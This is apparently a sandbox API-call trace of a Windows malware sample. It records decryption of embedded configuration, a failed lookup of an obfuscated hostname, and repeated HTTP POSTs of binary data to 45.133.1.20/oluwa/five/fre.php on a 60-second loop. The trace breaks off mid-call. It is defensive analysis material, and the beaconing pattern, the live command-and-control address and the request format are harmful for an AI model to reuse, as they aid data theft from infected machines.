LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.078] GetProcessHeap () returned 0x6a0000 [0208.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0208.079] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.079] GetProcessHeap () returned 0x6a0000 [0208.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0208.084] GetProcessHeap () returned 0x6a0000 [0208.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.085] GetProcessHeap () returned 0x6a0000 [0208.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0208.085] GetProcessHeap () returned 0x6a0000 [0208.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0208.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.096] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0208.107] GetProcessHeap () returned 0x6a0000 [0208.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0208.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.108] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0208.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.109] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.111] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.111] GetProcessHeap () returned 0x6a0000 [0208.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0208.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.113] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0208.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.114] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0208.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.115] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0208.115] GetProcessHeap () returned 0x6a0000 [0208.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.117] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0208.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.118] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0208.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.119] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0208.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.121] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0208.121] GetProcessHeap () returned 0x6a0000 [0208.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0208.121] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0208.121] GetProcessHeap () returned 0x6a0000 [0208.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0208.121] socket (af=2, type=1, protocol=6) returned 0x594 [0208.122] connect (s=0x594, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0208.151] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0208.151] GetProcessHeap () returned 0x6a0000 [0208.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0208.152] GetProcessHeap () returned 0x6a0000 [0208.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c6720 [0208.152] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.154] wvsprintfA (in: param_1=0x6c6720, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.154] GetProcessHeap () returned 0x6a0000 [0208.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0208.154] GetProcessHeap () returned 0x6a0000 [0208.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0208.154] GetProcessHeap () returned 0x6a0000 [0208.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0208.154] GetProcessHeap () returned 0x6a0000 [0208.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c6720 [0208.155] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.156] wvsprintfA (in: param_1=0x6c6720, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.157] GetProcessHeap () returned 0x6a0000 [0208.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0208.157] GetProcessHeap () returned 0x6a0000 [0208.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0208.158] send (s=0x594, buf=0x6b5c98*, len=242, flags=0) returned 242 [0208.158] send (s=0x594, buf=0x6bb998*, len=159, flags=0) returned 159 [0208.158] GetProcessHeap () returned 0x6a0000 [0208.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0208.158] recv (in: s=0x594, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0208.236] GetProcessHeap () returned 0x6a0000 [0208.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0208.237] GetProcessHeap () returned 0x6a0000 [0208.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0208.237] GetProcessHeap () returned 0x6a0000 [0208.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0208.237] GetProcessHeap () returned 0x6a0000 [0208.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0208.238] closesocket (s=0x594) returned 0 [0208.238] GetProcessHeap () returned 0x6a0000 [0208.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0208.238] GetProcessHeap () returned 0x6a0000 [0208.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.239] GetProcessHeap () returned 0x6a0000 [0208.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0208.239] GetProcessHeap () returned 0x6a0000 [0208.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0208.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe94) returned 0x594 [0208.249] Sleep (dwMilliseconds=0xea60) [0208.250] GetProcessHeap () returned 0x6a0000 [0208.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0208.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0208.268] GetProcessHeap () returned 0x6a0000 [0208.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0208.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.269] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0208.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.270] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.271] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.271] GetProcessHeap () returned 0x6a0000 [0208.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0208.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.273] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0208.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.274] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0208.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.275] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0208.275] GetProcessHeap () returned 0x6a0000 [0208.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.276] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.279] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.280] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.281] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.281] GetProcessHeap () returned 0x6a0000 [0208.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0208.281] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.281] GetProcessHeap () returned 0x6a0000 [0208.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0208.282] GetProcessHeap () returned 0x6a0000 [0208.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.282] GetProcessHeap () returned 0x6a0000 [0208.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0208.283] GetProcessHeap () returned 0x6a0000 [0208.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0208.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.284] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0208.297] GetProcessHeap () returned 0x6a0000 [0208.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0208.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.298] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0208.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.301] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.302] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.302] GetProcessHeap () returned 0x6a0000 [0208.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0208.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.304] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0208.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.304] CryptDestroyKey (hKey=0x6ad020) returned 1 [0208.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.305] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0208.305] GetProcessHeap () returned 0x6a0000 [0208.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.306] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0208.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.308] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0208.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.308] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0208.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.309] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0208.313] GetProcessHeap () returned 0x6a0000 [0208.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0208.313] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0208.313] GetProcessHeap () returned 0x6a0000 [0208.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0208.313] socket (af=2, type=1, protocol=6) returned 0x598 [0208.314] connect (s=0x598, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0208.339] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0208.339] GetProcessHeap () returned 0x6a0000 [0208.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0208.339] GetProcessHeap () returned 0x6a0000 [0208.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c6720 [0208.340] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.341] wvsprintfA (in: param_1=0x6c6720, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.341] GetProcessHeap () returned 0x6a0000 [0208.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0208.341] GetProcessHeap () returned 0x6a0000 [0208.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0208.342] GetProcessHeap () returned 0x6a0000 [0208.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0208.342] GetProcessHeap () returned 0x6a0000 [0208.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c6720 [0208.343] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.344] wvsprintfA (in: param_1=0x6c6720, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.344] GetProcessHeap () returned 0x6a0000 [0208.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0208.344] GetProcessHeap () returned 0x6a0000 [0208.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 [0208.345] send (s=0x598, buf=0x6b5c98*, len=242, flags=0) returned 242 [0208.345] send (s=0x598, buf=0x6bb998*, len=159, flags=0) returned 159 [0208.345] GetProcessHeap () returned 0x6a0000 [0208.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0208.345] recv (in: s=0x598, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0208.411] GetProcessHeap () returned 0x6a0000 [0208.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0208.412] GetProcessHeap () returned 0x6a0000 [0208.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0208.412] GetProcessHeap () returned 0x6a0000 [0208.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0208.412] GetProcessHeap () returned 0x6a0000 [0208.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0208.413] closesocket (s=0x598) returned 0 [0208.413] GetProcessHeap () returned 0x6a0000 [0208.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0208.413] GetProcessHeap () returned 0x6a0000 [0208.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.414] GetProcessHeap () returned 0x6a0000 [0208.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0208.414] GetProcessHeap () returned 0x6a0000 [0208.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0208.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xec0) returned 0x598 [0208.416] Sleep (dwMilliseconds=0xea60) [0208.418] GetProcessHeap () returned 0x6a0000 [0208.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0208.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.420] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0208.436] GetProcessHeap () returned 0x6a0000 [0208.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0208.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.438] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0208.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.439] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.448] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.448] GetProcessHeap () returned 0x6a0000 [0208.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0208.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.450] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0208.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.451] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0208.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.452] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0208.452] GetProcessHeap () returned 0x6a0000 [0208.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.457] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.458] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.459] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.459] GetProcessHeap () returned 0x6a0000 [0208.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0208.459] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.460] GetProcessHeap () returned 0x6a0000 [0208.460] HeapFree (in: 